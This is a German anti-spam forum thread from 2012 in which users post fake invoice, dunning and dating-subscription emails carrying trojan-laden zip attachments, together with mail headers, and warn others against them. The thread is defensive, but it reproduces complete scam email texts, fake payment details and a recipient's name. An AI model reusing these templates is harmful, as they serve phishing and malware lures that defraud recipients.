Natürlich hat laut diesen Mails Flirt-Fever immer eine andere Stadt als Sitz und die Namen der Geschäftsführer sind auch immer anders.

Nur haben sie alle auch einen zip-Anhang in der Mail, der natürlich auch nicht geöffnet werden sollte.

Da wurden Kundendaten von Flirt-Fever geklaut (oder verkauft?)!

Siehe >> http://www.antispam-ev.de/forum/showthread.php?33569-vor-Viren-Mails-mit-Betreff-Lieferschein-Rechnung-Mahnung-Forderung

Viren-Mails mit Betreff: Lieferschein / Rechnung / Mahnung / Forderung (http://www.antispam-ev.de/forum/showthread.php?33569-vor-Viren-Mails-mit-Betreff-Lieferschein-Rechnung-Mahnung-Forderung)

Das habe ich schon gelesen. Ich wollte das hier nur mitteilen.

Das ist zur Zeit Mode, ich und mehrere Arbeitskollegen haben auch eine E Mail von Flirtfever bekommen wo wir angeblich irgendwelche Abo´s abgeschlossen haben obwohl dort keiner von uns registriert ist! Nun sollen wir horrende Summen ( 464 Euro, 999 Euro, 1300 Euro ) etc bezahlen! Frage mich dann immer wo die die Nummern bzw die E-Mail Adressen herbekommen :mad:

Gruß Cliofrau

haben auch eine E Mail von Flirtfever bekommen wo wir angeblich irgendwelche Abo´s abgeschlossen haben obwohl dort keiner von uns registriert ist
Auf keinen Fall den ZIP-Anhang öffnen. Der kommt nicht von Flirtfever. Da hängt ein Trojaner drinn, der dann deinen Rechner blockiert.

Frage mich dann immer wo die die Nummern bzw die E-Mail Adressen herbekommen

Wo andere Spammer halt auch so ihre Quellen haben: Adresshandel, Webspider, gecrackte Datenbanken, etc...

Hier reingerieselt mit folgenden Text:


Guten Tag H. T.,

Besten Dank für Ihren Einkauf bei Mirapodo Deutschland, nachfolgend finden Sie Ihre Kaufbestätigung.

Deine Transaktionsnummer: 913449683544
Bestellte Ware: Toshiba 5830222500 6880,50 Euro
Rechnung auf den Namen: H. T.
Abrechnung erfolgt durch: Lastschrift

Lieferadresse und detaillierte Rechnung finden Sie zwecks Sicherheitsgründen im zugefügtem Zip Ordner.

Die Zahlung wurde autorisiert und wird innerhalb 2 Tage abgeschrieben.
Kaufdetails und Widerruf Erklärung finden Sie in Beilage.


Ihr Kundensupport

Engel GmbH
Böcklerstrasse 21
42376 München

Telefon: (+49) 285 8616924
(Mo-Fr 8.00 - 17.00 Uhr, Sa 11.00 bis 15.00 Uhr)
Gesellschaftssitz Aulendorf
Umsatzsteuer-Nummer: AT264313436
Geschäftsleiter:

München und Plz 42376! :)

Wenn DIE mir verraten würden, wer SIE sind, würde ich IHNEN das Deutsche Postleitzahlenbuch zusenden. Natürlich auch virenverseucht. DIE müssen dann halt noch so lange warten, bis ich mal wieder erkältet bin. So mit gebrauchten Papiertaschentüchern als Lesezeichen! :)

Hallo,

hier auch mal wieder eine putzige Mahnung:


Hallo xxxxx,

Sicher ist es Ihnen entgangen, dass die Zahlfrist der nachfolgenden Rechnung abgelaufen ist. Auf zwei Erinnerungen haben Sie auch nicht reagiert.

Artikel: Leica 2Gen WD
Artikelnummer: 5738234931707
Mänge: 2
Betrag: 631,35 Euro

Wegen zusätzlichen Kosten anlässlich des Ausgleichs von Gebührenforderungen erheben wir Mahngebühren und Einschreibegebühren in der Höhe von 40.- Euro inkl. MwSt.

Wir bitten Sie, den ausstehenden Rechnungsbetrag in den nächsten 7 Tagen zu überweisen. Im Unglücksfall sehen wir uns leider gezwungen, ein Gerichtsverfahren in die Wege zu leiten und ein Inkasso Unternehmen für die weiteren Massnahmen zu beauftragen.

Sollte sich dieses Mahnungsschreiben mit der Bezahlung des ausstehenden Betrags zeitlich überschnitten haben, so betrachten Sie dieses Schreiben bitte als gegenstandslos.

Anlagen für Kunde xxxxx:
- Rechnung
- Artikel

Mit freundlichen Grüßen

Keller GmbH
Billufer 09
Bremen

Telefon: (0900) 835 0155994
(Mo-Fr 8.00 bis 18.00 Uhr, Sa 10.00 bis 18.00 Uhr)
Gesellschaftssitz ist Bad Bergzabern
Umsatzsteuer-ID: [ID filtered]
Geschäftsfuehrer: R. K.


Ich hoffe, mich ereilt jetzt nicht der angedrohte Unglücksfall - ausser vielleicht, ich öffne den Anhang namens "Vorderung.zip" :-)

Hier noch ein Header dazu:


Return-Path: rawdc [at] montereybay.com
Received: from mail.montereybay.com ([216.228.2.51]) by mx-ha.web.de (mxweb001) with ESMTP (Nemesis) ID: [ID filtered]
Received: (qmail 92133 invoked by UID: [UID filtered]
Received: from 71-8-232-70.static.krny.ne.charter.com (HELO 2003server) (71.8.232.70) by mail.montereybay.com with SMTP; Tue, 12 Jun 2012 xx:xx:xx -0700
MIME-Version: 1.0
Date: Tue, 12 Jun 2012 xx:xx:xx -0500
X-Priority: 3 (Normal)
X-Mailer: MIME-tools 5.41 (Entity 5.404)
Subject: PokaMax Mahnung für xxxxx Artikel 0009272555980
From: rawdc [at] montereybay.com
To: "xxxxx" <poor [at] spamvictim.tld>
Content-Type: multipart/mixed; boundary=-----_chilkat_112_caed_5aa926f4.677ac14f_.MIX
Message-ID: [ID filtered]
Envelope-To: <poor [at] spamvictim.tld>
X-UI-Filterresults: ;V01:K0:r7yQQM3X:9jQ1UMpZ/VLAaadhTKqEbpGvMSDJm/ikKT9 n9YFdmIE7igdEcP8nUJjSh1DO3JZG4GJgN80qfNj7Mu0/4ThLG0avJ7CMpYF/lwyY9CeR1E k2pgYbdo5RZPxjxncGvxyteVuFVC2XFbhSUZWRei36SQtKeLlecyPSxVFVzp44RzLTLkG33 8NG4+ZIuJTnD38+pLpYetz8bUZMtdkDX6SUZw==
Ordner: Unbekannt
Größe: 85 KB



Grüße, madman

Bei der Mehrwertdienstnummer fehlt die Preisangabe und die Postleitzahl ist scheinbar auch untergegangen.
Man wird nachlässig oder findet sich im eigenen Gewusel net mehr zurecht :D

Oooch - vielleicht ist ja Bremen nicht so groß - das findet der Postmann sicher auch so :D

Hab grad noch eine Mail an abuse [at] charter.com rausgeschickt - von dort is das ja wohl eingekippt worden...

Oooch - vielleicht ist ja Bremen nicht so groß - das findet der Postmann sicher auch so

Wenn es denn die gefakte Anschrift überhaupt gäbe. Deshalb kann in diesem Fall auch der aufmerksamste Postbote nichts zustellen.

@madman70

"...ein Gerichtsverfahren in die Wege zu leiten und ein Inkasso Unternehmen für die weiteren Massnahmen zu beauftragen."

Das sollte doch anders herum sein!

Und dann auch noch ein "Geschäftsführer", der so arm ist, dass er sich als Namen nur zwei Buchstaben leisten kann. :)

DIE haben wieder eine neue Masche drauf!

http://www.gutefrage.net/frage/weitere-abzocke-email-von-einer-softking-gmbh


diese E-Mail wurde bei der Eröffnung von 1 O2 Mobilfunk Verträgen (?) angegeben.
Angeblich wurden die Simkarten bei der Vertragsunterzeichnung zur Verfügung gestellt. Es wurde mehrfach versucht diese mit 2 IPhones 4S an die angegebene Adresse zuzustellen, was aber misslang. Jetzt wird nachgefragt, was damit geschenhen soll.

In Beilage steckt Kopie des Vertrags, die Ausweis-Kopie des Vertrages (ja genau, einmal Vertrags und einmal Vertrages, Rechnungen sowie der Einzelverbindungsnachweis.

Softking GmbH Herrmannstal 35 Stuttgart

Und hier noch so eine:

http://www.gutefrage.net/frage/abzocke-email-

Habe heute das hier bekommen:


Sehr geehrter fischkopp,

Sicher ist es Ihnen entgangen, dass die Bezahlfrist der nachfolgenden Rechnung abgelaufen ist. Auf zwei Erinnerungen haben Sie auch nicht reagiert.

Ihre Bestellung: Apple THK SJ
Artikelnummer: 4785201183206
Stück: 2
Zwischensumme: 936,52 Euro

Durch entstandene zusätzliche Kosten anlässlich des Ausgleichs von Gebührenforderungen erheben wir Mahngebühren und Einschreibegebühren in der Höhe von 40.- Euro inkl. MwSt.

Wir bitten Sie, die gesammte Summe in den nächsten 7 Tagen zu überweisen. Im Unglücksfall sehen wir uns leider gezwungen, ein Betreibungsverfahren in die Wege zu leiten und ein Inkasso Unternehmen für die weiteren Massnahmen zu beauftragen.

Sollte sich dieses Schreiben mit der Zahlung des ausstehenden Betrags gekreuzt haben, so betrachten Sie dieses Schreiben bitte als gegenstandslos.

Beilagen für Kunde fischkopp:
- Rechnungsübersicht
- Artikel

Mit besten Grüßen

Becker GmbH
Auersreihe 29
Keiserslauter

Telefon: (0900) 030 8497324
(Mo-Fr 8.00 bis 18.00 Uhr, Sa 10.00 bis 18.00 Uhr)
Gesellschaftssitz ist Essen
Umsatzsteuer-ID: [ID filtered]
Geschäftsfuehrer: xxx

Der zip-Anhang ist laut GData Antivirus mit einem Trojaner verseucht. Abgesehen davon, dass ich sowas natürlich nie bestellt habe, ist die ganze Email voller Fehler. Die Steuer-ID: [ID filtered]

Wer also sowas bekommt, kann es getrost in den Mülleimer verschieben.

Lernen DIE es je noch, Kaiserslautern richtig zu schreiben? :D

Hier doppelt aufgeschlagen. Zumindest die Initialen stimmen bei mir nun, der Rest ist immer wieder die gleiche Grütze.


Sehr geehrter

Sicher ist es Ihnen entgangen, dass die Zahlungsfrist der nachfolgenden Rechnung abgelaufen ist. Auf zwei Schreiben haben Sie auch nicht reagiert.

Ihre Bestellung: Dell Life VP
Artikelnummer: 5160898772433
Stück: 4
Zwischensumme: 723,03 Euro

Aufgrund zusätzlicher Kosten anlässlich des Ausgleichs von Gebührenforderungen erheben wir Mahngebühren und Einschreibegebühren in der Höhe von 10.- Euro inkl. MwSt.

Wir bitten Sie, den ausstehenden Rechnungsbetrag in den nächsten 7 Tagen zu überweisen. Ansonsten sehen wir uns leider gezwungen, ein Inkassoverfahren in die Wege zu leiten und ein Inkasso Unternehmen für die weiteren Massnahmen zu beauftragen.

Sollte sich dieses Mahnungsschreiben mit der Bezahlung des ausstehenden Betrags gekreuzt haben, so betrachten Sie dieses Mahnungsschreiben bitte als gegenstandslos.

Anlagen:
- Rechnung
- Bestellung

Mit besten Grüßen

Dnet24 GmbH


Sehr geehrter

Sicher ist es Ihnen entgangen, dass die Zahlungsfrist der nachfolgenden Rechnung abgelaufen ist. Auf zwei Erinnerungen haben Sie auch nicht reagiert.

Ihre Bestellung: IBM Intaste JW
Artikelnummer: 0686976762611
Stück: 1
Summe: 794,11 Euro

Aufgrund zusätzlicher Kosten anlässlich des Ausgleichs von Gebührenforderungen erheben wir Mahngebühren und Einschreibegebühren in der Höhe von 10.- Euro inkl. MwSt.

Wir bitten Sie, den ausstehenden Rechnungsbetrag in den nächsten 7 Tagen zu überweisen. Ansonsten sehen wir uns leider gezwungen, ein Gerichtsverfahren in die Wege zu leiten und ein Inkasso Unternehmen für die weiteren Massnahmen zu beauftragen.

Sollte sich dieses Schreiben mit der Zahlung des ausstehenden Betrags gekreuzt haben, so betrachten Sie dieses Mahnungsschreiben bitte als gegenstandslos.

Beilagen:
- Zahlschein
- Bestellung

Mit freundlichen Grüßen

FOTO THUN GMBH

Hallo,

hier auch mal wieder eine putzige Mahnung...


Hallo, ich vermute, die E-mail, die ich am 13.06 erhalten habe, stammt von derselben Person:


Sehr geehrter Benutzer XXX,
sicherlich ist es Ihnen entgangen, dass die Zahlungsfrist der nachfolgenden Rechnung abgelaufen ist. Auf unsere Erinnerungen haben Sie ebenfalls nicht reagiert.

Ihre Bestellung: Lenovo THK RV
Artikelnummer: 6945104000774
Stück: 2
Betrag: 567,14 Euro

Wegen zusätzlichen Unkosten anlässlich des Ausgleichs von Gebührenforderungen erheben wir Mahngebühren und Einschreibegebühren in der Höhe von 60.- Euro inkl. MwSt.

Wir bitten Sie, den Gesamtbetrag in den nächsten 7 Tagen zu überweisen. Im Unglücksfall sehen wir uns leider gezwungen, ein Inkassoverfahren in die Wege zu leiten und ein Inkasso Unternehmen für die weiteren Massnahmen zu beauftragen.

Sollte sich dieses Schreiben mit der Zahlung des ausstehenden Betrags gekreuzt haben, so betrachten Sie dieses Schreiben bitte als gegenstandslos.

Anlagen:
- Rechnung
- Lieferschein

Mit freundlichen Grüßen

Walter GmbH
Audorfring 49
Dortmund

Telefon: (0900) 708 4902342
(Mo-Fr 8.00 bis 18.00 Uhr, Sa 10.00 bis 18.00 Uhr)
Gesellschaftssitz ist Bad Aibling
Umsatzsteuer-ID: [ID filtered]
Geschäftsfuehrer: Niels Schmitt

Als Anhang eine Zip-Datei, die sich beim entpacken im Onlinespeicher als Ms-dos- anwendung ausgewiesen hat und nicht geöffnet wurde. Danach wurde alles gesäubert und der Virenscan eingeschaltet. Ohne Befund. Noch :rolleyes: Schade, dass ich das Forum so spät gefunden habe.


Return-Path: cp286 [at] 21cn.com
Received: from 21cn.com ([59.36.102.63]) by mx-ha.web.de (mxweb008) with ESMTP (Nemesis) ID: [ID filtered]
Received: from ip?68.163.72.231? (unknown [10.27.2.12]) by 21cn.com (HERMES) with ESMTP ID: [ID filtered]
Received: from ip<68.163.72.231> ([68.163.72.231]) by -AUTH LOGIN(Yuwen filter gate 10.27.2.12) with ESMTP ID: [ID filtered]

Weiterer Run, neue Texte:


Sehr geehrter Benutzer H. T.,

Auf zwei Erinnerungen ist keine Reaktion von ihnen erfolgt. Bestimmt ist es Ihnen entgangen, dass die Zahlungsfrist der nachfolgenden Rechnung verstrichen ist.

Zwischensumme: 840,43 Euro
Stück: 1
Gelieferte Ware: Sony Core GE
Artikel Nr.: 4069994206122

Wegen zusätzlichen Unkosten anlässlich des Ausgleichs von Gebührenforderungen erheben wir Mahngebühren und Einschreibegebühren in der Höhe von 40.- Euro

Falls in den nächsten 5 Tagen der Gesamtbetrag nicht überwiesen wird, sehen wir uns leider gezwungen, ein Gerichtsverfahren in die Wege zu leiten und ein Inkasso Unternehmen für die weiteren Massnahmen zu beauftragen.

Betrachten Sie dieses Mahnungsschreiben bitte als gegenstandslos, falls sich dieses Mahnungsschreiben mit der Zahlung des ausstehenden Betrags zeitlich überschnitten haben sollte.

Beilagen:
- Rechnungsübersicht
- Lieferschein

Mit besten Grüßen

Schuster GmbH
Culinstrasse 53
Bielefeld

Telefon: (0180) 959 6983089
(Mo-Fr 8.00 bis 18.00 Uhr, Sa 10.00 bis 18.00 Uhr)
Gesellschaftssitz ist Alzey
Umsatzsteuer-ID: [ID filtered]
Geschäftsfuehrer: Lukas Wagner

From - Wed Jul 11 xx:xx:xx 2012
X-Account-Key: account1
X-UIDL: [UID filtered]
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Return-Path: <manfred.rosenhagen [at] t-online.de>
Delivered-To: GMX delivery to poor [at] spamvictim.tld
Received: (qmail invoked by alias); 11 Jul 2012 xx:xx:xx -0000
Received: from mailout07.t-online.de (EHLO mailout07.t-online.de) [194.25.134.83]
by mx0.gmx.net (mx048) with SMTP; 11 Jul 2012 xx:xx:xx +0200
Received: from fwd15.aul.t-online.de (fwd15.aul.t-online.de )
by mailout07.t-online.de with smtp
ID: [ID filtered]
Received: from PCPSRV1 (Xpx65EZBQh4Meh-tyKzeuDYcM6jlMoOS+5NuEhLM67xeP8u8iin4-WvDPN7tPJ+gaT@[207.145.140.242]) by fwd15.t-online.de
with esmtp ID: [ID filtered]
MIME-Version: 1.0
Date: Wed, 11 Jul 2012 xx:xx:xx -0400
X-Priority: 3 (Normal)
X-Mailer: IPB PHP Mailer 93
Subject: =?iso-8859-1?Q?SP24.com_Mahnung_?=
=?iso-8859-1?Q?f=FCr_Hakan_Tasgin_?=
=?iso-8859-1?Q?Artikel_834313773?=
=?iso-8859-1?Q?4791_10.07.2012?=
From: manfred.rosenhagen [at] t-online.de
To: "Hakan Tasgin" <poor [at] spamvictim.tld>
Content-Type: multipart/mixed;
boundary="-----_chilkat_6de_4bb9_51684f0b.81a64203_.MIX"
Message-ID: [ID filtered]
X-ID: [ID filtered]
X-TOI-MSGID: [ID filtered]
X-GMX-Antivirus: 0 (no virus found)
X-GMX-Antispam: 0 (Mail was not recognized as spam);
Detail=5D7Q89H36p6QcpxJ5OWiRkVBN7lH7VaTYkq3CSfnBUSc6T4Ky0IL2O60s0pxeauPtLrgO
ACagvCcyULegWM3x8ASZSil2pDNLLOAVjTP/0LN37Ls/MV+ZeYJYz0CR4+BPUAVi9KX8ZfeMIOnW
K82iG6Y1MHznvF10tixpnH6y0IMr655VwicIg==V1;


Im Anhang steckt eine wichtig.zip, darin dann der Trojaner "tr/drop.injector.fhdt" --> GVU Trojaner mit 100 Euro Zahlungsaufforderung

Und GMX hat die Mail weder als Spam erkann noch den Virus drin gefunden...

Im Anhang steckt eine wichtig.zip, darin dann der Trojaner "tr/drop.injector.fhdt" --> GVU Trojaner mit 100 Euro Zahlungsaufforderung
Der kommt heutzutage schon mit Webcam-Unterstützung: http://heise.de/-1636582

Mit Verlaub: Was sind "Unkosten"?

Sind das: unglaublich hohe Kosten oder ungaublich dämliche Kosteneintreiber? ;)

Mit Verlaub: Was sind "Unkosten"?
http://faql.de/wortgebrauch.html#unkosten via http://de.wikipedia.org/wiki/Unkosten

hallo

ich hab vor ein paar tagen eine email in form einer mahnung erhalten. die absender adresse bestand aus einem deutschen vor- und nachnamen mit der endung web.de.

hier die email:
Sehr geehrter Benutzer xxxxxx xxxxxxxxx,

Auf zwei Schreiben ist keine Reaktion von ihnen erfolgt. Vielleicht ist es Ihnen entgangen, dass die Zahlungsfrist der nachfolgenden Buchung abgelaufen ist.

Zwischensumme: 826,28 Euro
Stück: 4
Artikel: Siemens IDK FA
Artikelnummer: 8077564209574

Aufgrund zusätzlicher Unkosten anlässlich des Ausgleichs von Gebührenforderungen erheben wir Mahngebühren und Einschreibegebühren in der Höhe von 90.- Euro

Falls in den folgenden 6 Tagen der Gesamtbetrag nicht überwiesen wird, sehen wir uns leider gezwungen, ein Inkassoverfahren in die Wege zu leiten und ein Inkasso Unternehmen für die weiteren Massnahmen zu beauftragen.

Betrachten Sie dieses Mahnungsschreiben bitte als gegenstandslos, falls sich dieses Schreiben mit der Bezahlung des ausstehenden Betrags zeitlich überschnitten haben sollte.

Anlagen:
- Rechnungsübersicht
- Bestellung

Mit freundlichen Grüßen

Weber GmbH
Bergstieg 96
Keiserslauter

Telefon: (0180) 448 7221128
(Mo-Fr 8.00 bis 18.00 Uhr, Sa 10.00 bis 18.00 Uhr)
Gesellschaftssitz ist Ahlen
Umsatzsteuer-ID: [ID filtered]
Geschäftsfuehrer: Leona Otto

Der name in der Anrede ist nicht mein name und ich habe selbstverständlich nie was bei dieser firma (die es wohl auch garnicht gibt) bestellt.
die email hatte einen anhang welcher sich als trojaner entpuppte.


Nun zu meinen Fragen:
damit man sich bei web.de anmelden kann, muss man bei der registrierung seine tatsächliche anschrift usw angeben und man erhält dann post (echter brief) mit einem code den man zur bestätigung auf web.de angeben muss.
von daher müsste eine emailadresse bei web.de ungeeignet sein zum versenden von trojanern, da das ja wohl eine strafbare handlung ist und web.de die anschrift usw des nutzers kennt.
kann man davon ausgehen, dass diese emailadresse, von der ich den spam erhalten hatte, gehackt wurde?
ich wollte auf web.de den spam melden, habe dort aber keine entsprechende funktion gefunden. habe ich vielleicht was übersehen?
gibts es sonst irgendwelche möglichkeiten um spam/trojanerversand zu melden damit das eventuell auch strafrechtlich untersucht wird?

dank im vorraus
dieter

Tacker in Regal lege

Dazu gibt es schon ein Thema (https://www.antispam-ev.de/forum/showthread.php?33431-Virus-Neue-Bestellung-Lieferschein-f%FCr-xxx-Mahnung) - @Mods: bitte tackern

...] damit man sich bei web.de anmelden kann, muss man bei der registrierung seine tatsächliche anschrift usw angeben und man erhält dann post (echter brief) mit einem code den man zur bestätigung auf web.de angeben muss. [...Ohne Header kann man gar nicht sagen, ob das überhaupt von Web.de kam. Die Absender-Adresse (reply-to) kann beliebig eintragen werden.

...]kann man davon ausgehen, dass diese emailadresse, von der ich den spam erhalten hatte, gehackt wurde? [...Theoretisch ja, ich vermute aber eine gefälschte reply-to-Adresse

...] gibts es sonst irgendwelche möglichkeiten um spam/trojanerversand zu melden [... http://www.spamcop.net

Oft werden diese Mails von gehackten Mailaccounts versendet, d.h. dem Inhaber eines web.de-Accounts ist sein Zugangspasswort gehackt worden. Oder die Absendeadresse (Reply-To) ist gefälscht. Die Täter sind i.d.R. Russen und nicht ermittelbar.

Neuer Versuch, gleiche Datenquelle:


Hallo ,

Sofort wird es erotisch. In deinem Postfach befinden sich neue Meldung.
Bestimmt dein Traumpartner? Finde es heraus!

Die Nachricht befindet sich in der beigefügten Datei.

Eure Erotik Gemeinschaft
Achtung Diese Mail erhältst du aufgrund deiner Mitgliedschaft.

Im Anhang befindet sich eine Nachricht.zip

Return-Path: <crkethan [at] kingwoodcable.net>
Delivered-To: GMX delivery to poor [at] spamvictim.tld
Received: (qmail invoked by alias); 14 Jul 2012 xx:xx:xx -0000
Received: from txlegofep02.suddenlink.net (EHLO txlegofep02.suddenlink.net) [208.180.40.76]
by mx0.gmx.net (mx075) with SMTP; 14 Jul 2012 xx:xx:xx +0200
Received: from mex2003a.mexeagle.local ([66.155.205.117])
by txlegofep02.suddenlink.net
(InterMail vM.7.09.01.03 201-2219-108-104-20100907) with ESMTP
ID: [ID filtered]
for <poor [at] spamvictim.tld>; Sat, 14 Jul 2012 xx:xx:xx -0500
MIME-Version: 1.0
Date: Sat, 14 Jul 2012 xx:xx:xx -0400
X-Priority: 3 (Normal)
X-Mailer: IPB PHP Mailer 94
Subject: =?iso-8859-1?Q?Neue_Nachricht_f=FC?=
=?iso-8859-1?Q?r_TrueLife_14.07.?=
=?iso-8859-1?Q?2012?=
From: crkethan [at] kingwoodcable.net
To: "TrueLife" <poor [at] spamvictim.tld>
Content-Type: multipart/mixed;
boundary="-----_chilkat_ff4_b977_fe218d01.8b3a0730_.MIX"
Message-ID: [ID filtered]
X-Cloudmark-Analysis: v=1.1 cv=VETwTmBfWKShyz/eOAHyMEE4cAMhOTnUYWRKBlUO0yI= c=1 sm=0 a=KE_qcvql5UAA:10 a=dNb0GxJwOzUA:10 a=jPJDawAOAc8A:10 a=audjsN3uTWWX6hHgWjcA:9 a=wPNLvfGTeEIA:10 a=h8cmCR6lAAAA:8 a=NanZbqhIW7VEPJcznrEA:9 a=IKIoO-ieCDEA:10 a=NWVoK91CQyQA:10 a=HpAAvcLHHh0Zw7uRqdWCyQ==:117
X-GMX-Antivirus: 0 (no virus found)
X-GMX-Antispam: 5 (eXpurgate);
Detail=5D7Q89H36p7RD0ZwpkL6+eQgmvCvQtD8tE4gQ4yR9sW4hdbDtVqqax/mYU0nj5IBIzR3r
GvZgPHHpXGocv3HGTJPpx9ZfUwFYtYS0PRq12BCN/FrCYOOlXju0QaEMDybQJAfMk1aONpXKUTaE
S0Zro3zC3a1j0jLcMrA9yUqr9eoUeQak42xSy/G0oHfuc7C0352Mzx4nceWtd7oX0rkWw==V1;
X-GMX-UID: [UID filtered]
X-Flags: 1401


Selbe Datenliste wird hier auch angespammt - da werden Geldwäscher gesucht: http://antispam-ev.de/forum/showthread.php?33784-Mystery-Shopper-gesucht-landesweit!&p=338134#post338134

Und noch eine Mahnung hinterher:


Sehr geehrter Nutzer TrueLife,

wir bedanken uns für Ihr Interesse an dem kostenpflichtigen Angebot von Flirt Kontakte GmbH. Seit Ihrer Anmeldung am 15.06.2012 sind nunmehr zwei Wochen verstrichen, ohne dass Sie wirksam von Ihrem Widerrufsrecht Gebrauch gemacht haben. Wir freuen uns daher, dass unser Angebot Ihren Zuspruch gefunden hat und erlauben uns, für die Bereitstellung und Erbringung unserer Dienstleistung das vereinbarte Nutzungsentgelt in Rechnung zu stellen.

Kunden Nr.: QUHHA-093703
Rechnung: ZDQT51757-1865217394

Jahres Anmeldung: 221,48 EUR
Abo Dauer: 04.06.2012 - 03.06.2013

Bitte überweisen Sie den Rechnungsbetrag bis zum 17.07.2012 unter Angabe des Verwendungszwecks MGGS33650-9874946725 an unser Bankkonto:

Kontoinhaber: Arnold GmbH
Konto Nr.: 962211994
Bankleitzahl: 223 809 32

Wir bitten Sie die gesammte Summe innerhalb der gennanten Frist zu überweisen,um die Entstehung zusätzlicher Mahnkosten zu vermeiden.

Beilagen:
- Rechnungsübersicht
- Vertragsdaten

Ferner haben Sie uns gegenüber bestätigt, die diesem Vertrag zugrunde liegenden AGB gelesen und angenommen zu haben. Das Ihnen zustehende Widerrufsrecht haben Sie gar nicht, nicht fristgerecht oder unwirksam ausgeübt.

Mit verbindlichen Grüßen Ihr Support Team

Die Auftrag.zip wird ebenfalls wieder als ATRAPS.Gen2 von AVIRA erkannt --> BKA-Trojaner.

Hier der Header:

Return-Path: <leah [at] lseverson.com>
Delivered-To: GMX delivery to poor [at] spamvictim.tld
Received: (qmail invoked by alias); 13 Jul 2012 xx:xx:xx -0000
Received: from ef.e6.84ae.static.theplanet.com (HELO xeno.phpwebhosting.com) [174.132.230.239]
by mx0.gmx.net (mx020) with SMTP; 13 Jul 2012 xx:xx:xx +0200
Received: (qmail 22750 invoked from network); 13 Jul 2012 xx:xx:xx -0000
Received: from unknown (HELO mex2003a.mexeagle.local) (leah [at] lseverson.com@66.155.205.117)
by xeno.phpwebhosting.com with SMTP; Fri, 13 Jul 2012 xx:xx:xx -0500
MIME-Version: 1.0
Date: Fri, 13 Jul 2012 xx:xx:xx -0400
X-Priority: 3 (Normal)
X-Mailer: Mailman v4.2.5
Subject: TrueLife Mahnungsschreiben keine Antwort
From: leah [at] lseverson.com
To: "TrueLife" <poor [at] spamvictim.tld>
Content-Type: multipart/mixed;
boundary="-----_chilkat_5b5_012d_d9bd4aaa.4cf9b442_.MIX"
Message-ID: [ID filtered]
X-GMX-Antivirus: 0 (no virus found)
X-GMX-Antispam: 5 (eXpurgate);
Detail=5D7Q89H36p7RD0ZwpkL6+eQgmvCvQtD85Z5BwGC8N6d0ovxTH2g7gz7JmP+jC1EUFNUFE
HyT9SqOzkGQDHgnBLBcQkXdvsD5zOrfmwVZ6571fCEf5eXt2tXSw4a4sXmxPri9HzWJmtGr6AyA9
XAsPfN2wvUyzPfSrPCHVGBq0QnXzz8z2Ds0ksQlffF0QoVG8RP4IVDUox3C7fdnptErOxZeQLxuT
pQ4V1;
X-GMX-UID: [UID filtered]
X-Flags: 1401

Hallo zusammen,

mir hat man auch grade versucht einen Virus / Trojaner unterzujubeln.

Die angegebene Firma existiert nicht und die Steuernummer ist auch ungültig.




Sehr geehrte/r Kunde/Kundin,

wohl in in unserem Brief vom 06.06.2012 wurden Sie benachrichtigt, dass die nicht bezahlte Forderung von 1952,56 Euro immer noch nicht beglichen wurde. Mit dieser Email verpflichten wir Sie Ihrer Zahlungsverpflichtung nachzukommen.

Da dies die zweite Mahnung ist, die Sie über Ihre Schulden warnt, sind wir verplichtet Ihnen leider die Kosten von 10,00 Euro dazu zu der noch offenen Forderung als Mahnung in Rechnung stellen.

Wir bitten Sie, den offenen Betrag bis zum 20.07.2012 auf das angegebene Konto zu überweisen.

Andernfalls sind wir gezwungen, unsere Rechnung Inkassounternehmen geltend zu machen.

Zahlschein und Artikel finden Sie in dem beigefügtem Dokument.


Mit freundlichen Grüßen

SeebergShop GmbH
Geschaeftssitz ist Alzenau
Steuer-Nummer DE565725788
Inhaber: Vincent Dietrich


1 Anhang: Produkte 07.2012.zip 20,4 KB


Return-Path: <roseevans [at] suddenlink.net>
Received: from txlegofep02.suddenlink.net (txlegofep02.suddenlink.net [208.180.40.76])
by mtain-de12.r1000.mx.aol.com (Internet Inbound) with ESMTP ID: [ID filtered]
for <poor [at] spamvictim.tld>; Mon, 16 Jul 2012 xx:xx:xx -0400 (EDT)
Received: from IPSERVER.msp.local ([108.55.202.41])
by txlegofep02.suddenlink.net
(InterMail vM.7.09.01.03 201-2219-108-104-20100907) with ESMTP
ID: [ID filtered]
for <poor [at] spamvictim.tld>; Mon, 16 Jul 2012 xx:xx:xx -0500
MIME-Version: 1.0
Date: Mon, 16 Jul 2012 xx:xx:xx -0400
X-Priority: 3 (Normal)
X-Mailer: Evolution/2.4-6mdk
Subject: =?iso-8859-1?Q?Abmahnung_f=FCr_?=
From: roseevans [at] suddenlink.net
To: poor [at] spamvictim.tld
Content-Type: multipart/mixed;
boundary="-----_chilkat_501_825b_b0792e6f.2e013f7d_.MIX"
Message-ID: [ID filtered]
X-Cloudmark-Analysis: v=1.1 cv=QZLySw6m5Fy7rpiCYmBgpyNm4of6k3HOFYZFjZ7WLfU= c=1 sm=0 a=Vm81MP2ThugA:10 a=xzW3HwPJiLYA:10 a=jPJDawAOAc8A:10 a=TncenRqkx-JXdlhJT0YA:9 a=wPNLvfGTeEIA:10 a=xlNDx5TkQfAVO-6rOLgA:9 a=IKIoO-ieCDEA:10 a=HpAAvcLHHh0Zw7uRqdWCyQ==:117
x-aol-global-disposition: S
X-AOL-VSS-INFO: 5400.1158/82273
X-AOL-VSS-CODE: clean
X-AOL-SCOLL-SCORE: 0:2:134651088:93952408
X-AOL-SCOLL-URL_COUNT: 0
X-AOL-REROUTE: YES
x-aol-sID: [ID filtered]
X-AOL-IP: 208.180.40.76
X-AOL-SPF: domain : suddenlink.net SPF : none
X-Antivirus: avast! (VPS 120716-0, 16.07.2012), Inbound message
X-Antivirus-Status: Clean
Avast hat (noch) nichts gefunden.

Gruß Frechdachs


Den Quelltext vom Thunderbird habe ich, ist aber zu groß zum posten.

Und noch mal das gleiche auf einem anderem E-Mailkonto mit anderem Betrag.


Sehr geehrte/r Kunde/Kundin,

bereits in unserem Schreiben vom 16.06.2012 wurden Sie benachrichtigt, dass die nicht beglichene Forderung von 1621,14 Euro immer noch nicht beglichen wurde. Mit dieser E-Mail bitten wir Sie Ihrer Pflicht nachzukommen.

Da dies die zweite Aufforderung ist, die Sie über Ihren Rückstand warnt, sind wir verplichtet Ihnen leider die Kosten von 16,00 Euro dazu zu der noch offenen Forderung als Mahnung in Rechnung stellen.

Wir bitten Sie, den fälligen Betrag bis zum 18.07.2012 auf das angegebene Konto zu begleichen.

Sonst sehen wir uns gezwungen, unsere Forderung durch ein Inkassobüro geltend zu machen.

